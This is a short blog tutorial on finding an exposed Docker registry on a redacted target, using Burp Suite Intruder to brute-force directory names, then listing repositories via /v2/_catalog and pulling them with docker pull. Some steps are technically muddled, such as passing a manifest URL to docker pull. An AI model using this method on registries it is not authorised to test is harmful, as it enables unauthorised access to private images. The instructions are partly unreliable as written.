Hacking the Docker Registry with Burp Suite

In this blog post, we will walk through the process of finding security bugs in a Docker registry by using Burp Suite with Intruder feature. Specifically, we will focus on how to brute-force directory names to find the repository file, and then demonstrate how to exploit the repository to get files.

Scenario: Our target domain is redacted.com, and we want to find any security vulnerabilities in their Docker registry. Let’s get started!

Step 1: Set up Burp Suite

First, we need to set up Burp Suite as our proxy for intercepting and manipulating web traffic. Open Burp Suite, and make sure that the proxy is running on the default port 8080. Next, configure your browser to use Burp Suite as a proxy by setting the HTTP proxy to “localhost” and the port to “8080”.

Step 2: Find the repository file

Now that we have Burp Suite set up, we can start brute-forcing directory names to find the repository file. To do this, we will use Burp Suite’s Intruder feature. First, we need to capture a request to the Docker registry by browsing to redacted.com in our browser. In Burp Suite, go to the “Proxy” tab and find the captured request in the history. Right-click on the request and select “Send to Intruder”.

In the Intruder tab, go to the “Positions” tab and select the “Add” button. This will allow us to define the payload positions in the request. Select the “Clear” button to clear any existing payload positions, and then highlight the path of the request (e.g., “/a/”) in the request editor. Click the “Add” button again to add the highlighted text as a payload position.

Now, go to the “Payloads” tab and select the “Load” button. Choose the wordlist “directory-list-2.3-medium.txt” that you downloaded. This is a medium-sized wordlist of common directory names that we will use to brute-force the repository file.

Finally, go to the “Start Attack” tab and click the “Start Attack” button. Burp Suite will now begin brute-forcing the directory names using the wordlist.

Step 3: Get list of repository

Now you can add the _catalog parameter to list the available repositories “ redacted.com/v2/_catalog “

Step 4: Exploit the repository

Now that we have found the repository file, we can exploit it to get files. To do this, we will use the “docker pull” command to pull the contents of the repository onto our local machine.

First, copy the repository URL from the response in Burp Suite.

In our case, the repository URL is “redacted.com/v2/<repository-name>/manifests/<manifest-tag>”.

Replace “<repository-name>” and “<manifest-tag>” with the actual values from the response.

Next, open a terminal window and type the following command

docker pull <repository-url>

Replace “<repository-url>” with the actual URL that you copied from Burp Suite. This command will download the contents of the repository onto your local machine.

Congratulations! You have successfully found a security vulnerability in a Docker registry using Burp Suite with Intruder feature.

Reference : https://notsosecure.com/anatomy-of-a-hack-docker-registry